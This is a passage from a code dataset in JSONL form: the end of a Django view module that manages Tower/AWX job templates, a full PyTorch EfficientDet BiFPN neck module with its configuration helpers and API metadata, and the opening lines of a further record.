context=context)\n\n@permission_required('service_catalog.view_jobtemplate')\ndef job_template_compliancy(request, tower_id, job_template_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n job_template = get_object_or_404(JobTemplate, id=job_template_id)\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"},\n {'text': 'Job templates', 'url': reverse('service_catalog:tower_job_templates_list', args=[tower_id])},\n {'text': job_template.name, 'url': \"\"},\n {'text': 'Compliancy', 'url': \"\"}\n ]\n context = {\n 'breadcrumbs': breadcrumbs,\n 'compliancy_details': job_template.get_compliancy_details(),\n }\n return render(request, \"service_catalog/admin/tower/job_templates/job-template-compliancy.html\", context)\n\n\n@permission_required('service_catalog.change_towerserver')\ndef update_tower(request, tower_id):\n tower_server = get_object_or_404(TowerServer, id=tower_id)\n form = TowerServerForm(request.POST or None, instance=tower_server)\n if form.is_valid():\n form.save()\n return redirect('service_catalog:list_tower')\n breadcrumbs = [\n {'text': 'Tower/AWX', 'url': reverse('service_catalog:list_tower')},\n {'text': tower_server.name, 'url': \"\"}\n ]\n context = {'form': form, 'tower_server': tower_server, 'breadcrumbs': breadcrumbs, 'action': 'edit'}\n return render(request, 'service_catalog/admin/tower/tower-edit.html', context)\n", "sub_path": "service_catalog/views/admin/tower.py", "file_name": "tower.py", "file_ext": "py", "file_size_in_byte": 6496, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "service_catalog.forms.TowerServerForm", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 21, "usage_type": "call"}, {"api_name": "service_catalog.forms.TowerServerForm", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 14, "usage_type": "call"}, {"api_name": "service_catalog.tasks.sync_tower.delay", "line_number": 35, "usage_type": "call"}, {"api_name": "service_catalog.tasks.sync_tower", "line_number": 35, "usage_type": "attribute"}, {"api_name": "service_catalog.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "django_celery_results.models.TaskResult", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 32, "usage_type": "call"}, {"api_name": "django_celery_results.models.TaskResult.objects.get", "line_number": 43, "usage_type": "call"}, {"api_name": "django_celery_results.models.TaskResult.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django_celery_results.models.TaskResult", "line_number": 43, "usage_type": "name"}, {"api_name": "service_catalog.serializers.TaskResultSerializer", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 50, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 53, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 67, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 67, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "service_catalog.models.JobTemplate", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 77, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 79, "usage_type": "call"}, {"api_name": "service_catalog.models.Operation.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "service_catalog.models.Operation.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "service_catalog.models.Operation", "line_number": 84, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 87, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 88, "usage_type": "call"}, {"api_name": "service_catalog.models.OperationType.CREATE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "service_catalog.models.OperationType", "line_number": 92, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 96, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 101, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 101, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 102, "usage_type": "call"}, {"api_name": "service_catalog.models.JobTemplate", "line_number": 102, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 106, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 99, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 117, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 117, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 118, "usage_type": "call"}, {"api_name": "service_catalog.models.JobTemplate", "line_number": 118, "usage_type": "argument"}, {"api_name": "django.urls.reverse", "line_number": 120, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 122, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 135, "usage_type": "call"}, {"api_name": "service_catalog.models.TowerServer", "line_number": 135, "usage_type": "argument"}, {"api_name": "service_catalog.forms.TowerServerForm", "line_number": 136, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 139, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 145, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.permission_required", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "126105061", "text": "import torch\nimport torch.nn as nn\nimport logging\nfrom collections import OrderedDict\nfrom typing import List, Optional\nfrom timm.models.efficientnet import *\nfrom timm import create_model\nfrom timm.models.layers import create_conv2d, drop_path, create_pool2d, Swish\nfrom ..registry import NECKS\n\n_DEBUG = False\n\n_ACT_LAYER = Swish\n\n\n\"\"\"EfficientDet Configurations\n\nAdapted from official impl at https://github.com/google/automl/tree/master/efficientdet\n\nTODO use a different config system, separate model from train specific hparams\n\"\"\"\n\nimport ast\nimport copy\nimport json\nimport six\n\n\ndef eval_str_fn(val):\n if val in {'true', 'false'}:\n return val == 'true'\n try:\n return ast.literal_eval(val)\n except ValueError:\n return val\n\n\n# pylint: disable=protected-access\nclass Config(object):\n \"\"\"A config utility class.\"\"\"\n\n def __init__(self, config_dict=None):\n self.update(config_dict)\n\n def __setattr__(self, k, v):\n self.__dict__[k] = Config(v) if isinstance(v, dict) else copy.deepcopy(v)\n\n def __getattr__(self, k):\n return self.__dict__[k]\n\n def __repr__(self):\n return repr(self.as_dict())\n\n def __str__(self):\n try:\n return json.dumps(self.as_dict(), indent=4)\n except TypeError:\n return str(self.as_dict())\n\n def _update(self, config_dict, allow_new_keys=True):\n \"\"\"Recursively update internal members.\"\"\"\n if not config_dict:\n return\n\n for k, v in six.iteritems(config_dict):\n if k not in self.__dict__.keys():\n if allow_new_keys:\n self.__setattr__(k, v)\n else:\n raise KeyError('Key `{}` does not exist for overriding. '.format(k))\n else:\n if isinstance(v, dict):\n self.__dict__[k]._update(v, allow_new_keys)\n else:\n self.__dict__[k] = copy.deepcopy(v)\n\n def get(self, k, default_value=None):\n return self.__dict__.get(k, default_value)\n\n def update(self, config_dict):\n \"\"\"Update members while allowing new keys.\"\"\"\n self._update(config_dict, allow_new_keys=True)\n\n def override(self, config_dict_or_str):\n \"\"\"Update members while disallowing new keys.\"\"\"\n if isinstance(config_dict_or_str, str):\n config_dict = self.parse_from_str(config_dict_or_str)\n elif isinstance(config_dict_or_str, dict):\n config_dict = config_dict_or_str\n else:\n raise ValueError('Unknown value type: {}'.format(config_dict_or_str))\n\n self._update(config_dict, allow_new_keys=False)\n\n def parse_from_str(self, config_str):\n \"\"\"parse from a string in format 'x=a,y=2' and return the dict.\"\"\"\n if not config_str:\n return {}\n config_dict = {}\n try:\n for kv_pair in config_str.split(','):\n if not kv_pair: # skip empty string\n continue\n k, v = kv_pair.split('=')\n config_dict[k.strip()] = eval_str_fn(v.strip())\n return config_dict\n except ValueError:\n raise ValueError('Invalid config_str: {}'.format(config_str))\n\n def as_dict(self):\n \"\"\"Returns a dict representation.\"\"\"\n config_dict = {}\n for k, v in six.iteritems(self.__dict__):\n if isinstance(v, Config):\n config_dict[k] = v.as_dict()\n else:\n config_dict[k] = copy.deepcopy(v)\n return config_dict\n\n\ndef default_detection_configs():\n \"\"\"Returns a default detection configs.\"\"\"\n h = Config()\n\n # model name.\n h.name = 'tf_efficientdet_d1'\n\n # input preprocessing parameters\n h.image_size = 640\n h.input_rand_hflip = True\n h.train_scale_min = 0.1\n h.train_scale_max = 2.0\n h.autoaugment_policy = None\n\n # dataset specific parameters\n h.num_classes = 90\n h.skip_crowd_during_training = True\n\n # model architecture\n h.min_level = 3\n h.max_level = 7\n h.num_levels = h.max_level - h.min_level + 1\n h.num_scales = 3\n h.aspect_ratios = [(1.0, 1.0), (1.4, 0.7), (0.7, 1.4)]\n h.anchor_scale = 4.0\n h.pad_type = 'same'\n\n # is batchnorm training mode\n h.is_training_bn = True\n\n # optimization\n h.momentum = 0.9\n h.learning_rate = 0.08\n h.lr_warmup_init = 0.008\n h.lr_warmup_epoch = 1.0\n h.first_lr_drop_epoch = 200.0\n h.second_lr_drop_epoch = 250.0\n h.clip_gradients_norm = 10.0\n h.num_epochs = 300\n\n # classification loss\n h.alpha = 0.25\n h.gamma = 1.5\n\n # localization loss\n h.delta = 0.1\n h.box_loss_weight = 50.0\n\n # regularization l2 loss.\n h.weight_decay = 4e-5\n\n # For detection.\n h.box_class_repeats = 3\n h.fpn_cell_repeats = 3\n h.fpn_channels = 88\n h.separable_conv = True\n h.apply_bn_for_resampling = True\n h.conv_after_downsample = False\n h.conv_bn_relu_pattern = False\n h.use_native_resize_op = False\n h.pooling_type = None\n\n # version.\n h.fpn_name = None\n h.fpn_config = None\n\n # No stochastic depth in default.\n h.survival_prob = None # FIXME remove\n h.drop_path_rate = 0.\n\n h.lr_decay_method = 'cosine'\n h.moving_average_decay = 0.9998\n h.ckpt_var_scope = None\n h.backbone_name = 'tf_efficientnet_b1'\n h.backbone_config = None\n\n # RetinaNet.\n h.resnet_depth = 50\n return h\n\n\nefficientdet_model_param_dict = {\n 'tf_efficientdet_d0':\n dict(\n name='efficientdet_d0',\n backbone_name='tf_efficientnet_b0',\n image_size=512,\n fpn_channels=64,\n fpn_cell_repeats=3,\n box_class_repeats=3,\n ),\n 'tf_efficientdet_d1':\n dict(\n name='efficientdet_d1',\n backbone_name='tf_efficientnet_b1',\n image_size=640,\n fpn_channels=88,\n fpn_cell_repeats=4,\n box_class_repeats=3,\n ),\n 'tf_efficientdet_d2':\n dict(\n name='efficientdet_d2',\n backbone_name='tf_efficientnet_b2',\n image_size=768,\n fpn_channels=112,\n fpn_cell_repeats=5,\n box_class_repeats=3,\n ),\n 'tf_efficientdet_d3':\n dict(\n name='efficientdet_d3',\n backbone_name='tf_efficientnet_b3',\n image_size=896,\n fpn_channels=160,\n fpn_cell_repeats=6,\n box_class_repeats=4,\n ),\n 'tf_efficientdet_d4':\n dict(\n name='efficientdet_d4',\n backbone_name='tf_efficientnet_b4',\n image_size=1024,\n fpn_channels=224,\n fpn_cell_repeats=7,\n box_class_repeats=4,\n ),\n 'tf_efficientdet_d5':\n dict(\n name='efficientdet_d5',\n backbone_name='tf_efficientnet_b5',\n image_size=1280,\n fpn_channels=288,\n fpn_cell_repeats=7,\n box_class_repeats=4,\n ),\n 'tf_efficientdet_d6':\n dict(\n name='efficientdet_d6',\n backbone_name='tf_efficientnet_b6',\n image_size=1280,\n fpn_channels=384,\n fpn_cell_repeats=8,\n box_class_repeats=5,\n fpn_name='bifpn_sum', # Use unweighted sum for training stability.\n ),\n 'tf_efficientdet_d7':\n dict(\n name='efficientdet_d7',\n backbone_name='tf_efficientnet_b6',\n image_size=1536,\n fpn_channels=384,\n fpn_cell_repeats=8,\n box_class_repeats=5,\n anchor_scale=5.0,\n fpn_name='bifpn_sum', # Use unweighted sum for training stability.\n ),\n}\n\n\ndef get_efficientdet_config(model_name='efficientdet_d1'):\n \"\"\"Get the default config for EfficientDet based on model name.\"\"\"\n h = default_detection_configs()\n h.override(efficientdet_model_param_dict[model_name])\n return h\n\n\nclass SequentialAppend(nn.Sequential):\n def __init__(self, *args):\n super(SequentialAppend, self).__init__(*args)\n\n def forward(self, x: List[torch.Tensor]):\n for module in self:\n x.append(module(x))\n return x\n\n\nclass SequentialAppendLast(nn.Sequential):\n def __init__(self, *args):\n super(SequentialAppendLast, self).__init__(*args)\n\n def forward(self, x: List[torch.Tensor]):\n for module in self:\n x.append(module(x[-1]))\n return x\n\n\nclass ConvBnAct2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, dilation=1, padding='', bias=False,\n norm_layer=nn.BatchNorm2d, norm_kwargs=None, act_layer=_ACT_LAYER):\n super(ConvBnAct2d, self).__init__()\n norm_kwargs = norm_kwargs or {}\n self.conv = create_conv2d(\n in_channels, out_channels, kernel_size, stride=stride, dilation=dilation, padding=padding, bias=bias)\n self.bn = None if norm_layer is None else norm_layer(out_channels, **norm_kwargs)\n self.act = None if act_layer is None else act_layer(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.act is not None:\n x = self.act(x)\n return x\n\n\nclass SeparableConv2d(nn.Module):\n \"\"\" Separable Conv\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,\n channel_multiplier=1.0, pw_kernel_size=1, act_layer=_ACT_LAYER,\n norm_layer=nn.BatchNorm2d, norm_kwargs=None):\n super(SeparableConv2d, self).__init__()\n norm_kwargs = norm_kwargs or {}\n\n self.conv_dw = create_conv2d(\n in_channels, int(in_channels * channel_multiplier), kernel_size,\n stride=stride, dilation=dilation, padding=padding, depthwise=True)\n\n self.conv_pw = create_conv2d(\n int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)\n\n self.bn = None if norm_layer is None else norm_layer(out_channels, **norm_kwargs)\n self.act = None if act_layer is None else act_layer(inplace=True)\n\n def forward(self, x):\n x = self.conv_dw(x)\n x = self.conv_pw(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.act is not None:\n x = self.act(x)\n return x\n\n\nclass ResampleFeatureMap(nn.Sequential):\n\n def __init__(self, in_channels, out_channels, reduction_ratio=1., pad_type='', pooling_type='max',\n norm_layer=nn.BatchNorm2d, norm_kwargs=None, conv_after_downsample=False, apply_bn=False):\n super(ResampleFeatureMap, self).__init__()\n pooling_type = pooling_type or 'max'\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.reduction_ratio = reduction_ratio\n self.conv_after_downsample = conv_after_downsample\n\n conv = None\n if in_channels != out_channels:\n conv = ConvBnAct2d(\n in_channels, out_channels, kernel_size=1, padding=pad_type,\n norm_layer=norm_layer if apply_bn else None, norm_kwargs=norm_kwargs, bias=True, act_layer=None)\n\n if reduction_ratio > 1:\n stride_size = int(reduction_ratio)\n if conv is not None and not self.conv_after_downsample:\n self.add_module('conv', conv)\n self.add_module(\n 'downsample',\n create_pool2d(\n pooling_type, kernel_size=stride_size + 1, stride=stride_size, padding=pad_type))\n if conv is not None and self.conv_after_downsample:\n self.add_module('conv', conv)\n else:\n if conv is not None:\n self.add_module('conv', conv)\n if reduction_ratio < 1:\n scale = int(1 // reduction_ratio)\n self.add_module('upsample', nn.UpsamplingNearest2d(scale_factor=scale))\n\n # def forward(self, x):\n # # here for debugging only\n # assert x.shape[1] == self.in_channels\n # if self.reduction_ratio > 1:\n # if hasattr(self, 'conv') and not self.conv_after_downsample:\n # x = self.conv(x)\n # x = self.downsample(x)\n # if hasattr(self, 'conv') and self.conv_after_downsample:\n # x = self.conv(x)\n # else:\n # if hasattr(self, 'conv'):\n # x = self.conv(x)\n # if self.reduction_ratio < 1:\n # x = self.upsample(x)\n # return x\n\n\nclass FPNCombine(nn.Module):\n def __init__(self, feature_info, fpn_config, fpn_channels, inputs_offsets, target_reduction, pad_type='',\n pooling_type='max', norm_layer=nn.BatchNorm2d, norm_kwargs=None,\n apply_bn_for_resampling=False, conv_after_downsample=False, weight_method='attn'):\n super(FPNCombine, self).__init__()\n self.inputs_offsets = inputs_offsets\n self.weight_method = weight_method\n\n self.resample = nn.ModuleDict()\n for idx, offset in enumerate(inputs_offsets):\n in_channels = fpn_channels\n if offset < len(feature_info):\n in_channels = feature_info[offset]['num_chs']\n input_reduction = feature_info[offset]['reduction']\n else:\n node_idx = offset - len(feature_info)\n input_reduction = fpn_config.nodes[node_idx]['reduction']\n reduction_ratio = target_reduction / input_reduction\n self.resample[str(offset)] = ResampleFeatureMap(\n in_channels, fpn_channels, reduction_ratio=reduction_ratio, pad_type=pad_type,\n pooling_type=pooling_type, norm_layer=norm_layer, norm_kwargs=norm_kwargs,\n apply_bn=apply_bn_for_resampling, conv_after_downsample=conv_after_downsample)\n\n if weight_method == 'attn' or weight_method == 'fastattn':\n # WSM\n self.edge_weights = nn.Parameter(torch.ones(len(inputs_offsets)), requires_grad=True)\n else:\n self.edge_weights = None\n\n def forward(self, x):\n dtype = x[0].dtype\n nodes = []\n for offset in self.inputs_offsets:\n input_node = x[offset]\n input_node = self.resample[str(offset)](input_node)\n nodes.append(input_node)\n\n if self.weight_method == 'attn':\n normalized_weights = torch.softmax(self.edge_weights.type(dtype), dim=0)\n x = torch.stack(nodes, dim=-1) * normalized_weights\n elif self.weight_method == 'fastattn':\n edge_weights = nn.functional.relu(self.edge_weights.type(dtype))\n weights_sum = torch.sum(edge_weights)\n x = torch.stack(\n [(nodes[i] * edge_weights[i]) / (weights_sum + 0.0001) for i in range(len(nodes))], dim=-1)\n elif self.weight_method == 'sum':\n x = torch.stack(nodes, dim=-1)\n else:\n raise ValueError('unknown weight_method {}'.format(self.weight_method))\n x = torch.sum(x, dim=-1)\n return x\n\n\nclass BiFPNLayer(nn.Module):\n def __init__(self, feature_info, fpn_config, fpn_channels, num_levels=5, pad_type='',\n pooling_type='max', norm_layer=nn.BatchNorm2d, norm_kwargs=None, act_layer=_ACT_LAYER,\n apply_bn_for_resampling=False, conv_after_downsample=True, conv_bn_relu_pattern=False,\n separable_conv=True):\n super(BiFPNLayer, self).__init__()\n self.fpn_config = fpn_config\n self.num_levels = num_levels\n self.conv_bn_relu_pattern = False\n\n self.feature_info = []\n self.fnode = SequentialAppend()\n for i, fnode_cfg in enumerate(fpn_config.nodes):\n logging.debug('fnode {} : {}'.format(i, fnode_cfg))\n fnode_layers = OrderedDict()\n\n # combine features\n reduction = fnode_cfg['reduction']\n fnode_layers['combine'] = FPNCombine(\n feature_info, fpn_config, fpn_channels, fnode_cfg['inputs_offsets'], target_reduction=reduction,\n pad_type=pad_type, pooling_type=pooling_type, norm_layer=norm_layer, norm_kwargs=norm_kwargs,\n apply_bn_for_resampling=apply_bn_for_resampling, conv_after_downsample=conv_after_downsample,\n weight_method=fpn_config.weight_method)\n self.feature_info.append(dict(num_chs=fpn_channels, reduction=reduction))\n\n # after combine ops\n after_combine = OrderedDict()\n if not conv_bn_relu_pattern:\n after_combine['act'] = act_layer(inplace=True)\n conv_bias = True\n conv_act = None\n else:\n conv_bias = False\n conv_act = act_layer\n conv_kwargs = dict(\n in_channels=fpn_channels, out_channels=fpn_channels, kernel_size=3, padding=pad_type,\n bias=conv_bias, norm_layer=norm_layer, norm_kwargs=norm_kwargs, act_layer=conv_act)\n after_combine['conv'] = SeparableConv2d(**conv_kwargs) if separable_conv else ConvBnAct2d(**conv_kwargs)\n fnode_layers['after_combine'] = nn.Sequential(after_combine)\n\n self.fnode.add_module(str(i), nn.Sequential(fnode_layers))\n\n self.feature_info = self.feature_info[-num_levels::]\n\n def forward(self, x):\n x = self.fnode(x)\n return x[-self.num_levels::]\n\n\ndef bifpn_sum_config(base_reduction=8):\n \"\"\"BiFPN config with sum.\"\"\"\n p = Config()\n p.nodes = [\n {'reduction': base_reduction << 3, 'inputs_offsets': [3, 4]},\n {'reduction': base_reduction << 2, 'inputs_offsets': [2, 5]},\n {'reduction': base_reduction << 1, 'inputs_offsets': [1, 6]},\n {'reduction': base_reduction, 'inputs_offsets': [0, 7]},\n {'reduction': base_reduction << 1, 'inputs_offsets': [1, 7, 8]},\n {'reduction': base_reduction << 2, 'inputs_offsets': [2, 6, 9]},\n {'reduction': base_reduction << 3, 'inputs_offsets': [3, 5, 10]},\n {'reduction': base_reduction << 4, 'inputs_offsets': [4, 11]},\n ]\n p.weight_method = 'sum'\n return p\n\n\ndef bifpn_attn_config():\n \"\"\"BiFPN config with fast weighted sum.\"\"\"\n p = bifpn_sum_config()\n p.weight_method = 'attn'\n return p\n\n\ndef bifpn_fa_config():\n \"\"\"BiFPN config with fast weighted sum.\"\"\"\n p = bifpn_sum_config()\n p.weight_method = 'fastattn'\n return p\n\n\ndef get_fpn_config(fpn_name):\n if not fpn_name:\n fpn_name = 'bifpn_fa'\n name_to_config = {\n 'bifpn_sum': bifpn_sum_config(),\n 'bifpn_attn': bifpn_attn_config(),\n 'bifpn_fa': bifpn_fa_config(),\n }\n return name_to_config[fpn_name]\n\n\n@NECKS.register_module\nclass BiFPN(nn.Module):\n\n def __init__(self, name, norm_layer=nn.BatchNorm2d, norm_kwargs=None, act_layer=_ACT_LAYER):\n super(BiFPN, self).__init__()\n config = get_efficientdet_config(name)\n backbone_name = name.replace('det_d', 'net_b')\n self.config = config\n fpn_config = config.fpn_config or get_fpn_config(config.fpn_name)\n backbone = eval(backbone_name)(features_only=True, out_indices=(2,3,4))\n feature_info = [dict(num_chs=f['num_chs'], reduction=f['reduction'])\n for i, f in enumerate(backbone.feature_info())]\n del backbone\n self.resample = SequentialAppendLast()\n for level in range(config.num_levels):\n if level < len(feature_info):\n in_chs = feature_info[level]['num_chs']\n reduction = feature_info[level]['reduction']\n else:\n # Adds a coarser level by downsampling the last feature map\n reduction_ratio = 2\n self.resample.add_module(str(level), ResampleFeatureMap(\n in_channels=in_chs,\n out_channels=config.fpn_channels,\n pad_type=config.pad_type,\n pooling_type=config.pooling_type,\n norm_layer=norm_layer,\n norm_kwargs=norm_kwargs,\n reduction_ratio=reduction_ratio,\n apply_bn=config.apply_bn_for_resampling,\n conv_after_downsample=config.conv_after_downsample,\n ))\n in_chs = config.fpn_channels\n reduction = int(reduction * reduction_ratio)\n feature_info.append(dict(num_chs=in_chs, reduction=reduction))\n\n self.cell = nn.Sequential()\n for rep in range(config.fpn_cell_repeats):\n logging.debug('building cell {}'.format(rep))\n fpn_layer = BiFPNLayer(\n feature_info=feature_info,\n fpn_config=fpn_config,\n fpn_channels=config.fpn_channels,\n num_levels=config.num_levels,\n pad_type=config.pad_type,\n pooling_type=config.pooling_type,\n norm_layer=norm_layer,\n norm_kwargs=norm_kwargs,\n act_layer=act_layer,\n separable_conv=config.separable_conv,\n apply_bn_for_resampling=config.apply_bn_for_resampling,\n conv_after_downsample=config.conv_after_downsample,\n conv_bn_relu_pattern=config.conv_bn_relu_pattern\n )\n self.cell.add_module(str(rep), fpn_layer)\n feature_info = fpn_layer.feature_info\n\n # FIXME init weights for training\n\n def forward(self, x):\n assert len(self.resample) == self.config.num_levels - len(x)\n x = self.resample(x)\n x = self.cell(x)\n return x\n\n\n def init_weights(self, pretrained=None):\n pass", "sub_path": "mmdet/models/necks/bifpn.py", "file_name": "bifpn.py", "file_ext": "py", "file_size_in_byte": 21758, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "timm.models.layers.Swish", "line_number": 13, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 33, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 65, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 75, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 113, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 288, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 288, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 292, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 292, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 298, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 302, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 302, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 308, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 308, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 310, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 310, "usage_type": "name"}, {"api_name": "timm.models.layers.create_conv2d", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 327, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 327, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 332, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 332, "usage_type": "name"}, {"api_name": "timm.models.layers.create_conv2d", "line_number": 336, "usage_type": "call"}, {"api_name": "timm.models.layers.create_conv2d", "line_number": 340, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 356, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 356, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 359, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "name"}, {"api_name": "timm.models.layers.create_pool2d", "line_number": 379, "usage_type": "call"}, {"api_name": "torch.nn.UpsamplingNearest2d", "line_number": 388, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 388, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 407, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 407, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 409, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 409, "usage_type": "name"}, {"api_name": "torch.nn.ModuleDict", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 415, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 446, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 448, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 448, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 448, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 449, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 450, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 453, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 456, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 460, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 460, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 462, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 462, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 473, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 474, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 486, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 498, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 498, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 500, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 500, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 552, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 552, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 554, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 554, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 587, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 587, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 589, "usage_type": "call"}, {"api_name": "registry.NECKS.register_module", "line_number": 551, "usage_type": "attribute"}, {"api_name": "registry.NECKS", "line_number": 551, "usage_type": "name"}]} +{"seq_id": "154009849", "text": "import sys\r\nimport pydicom\r\n#import scipy.misc\r\nimport os\r\nimport 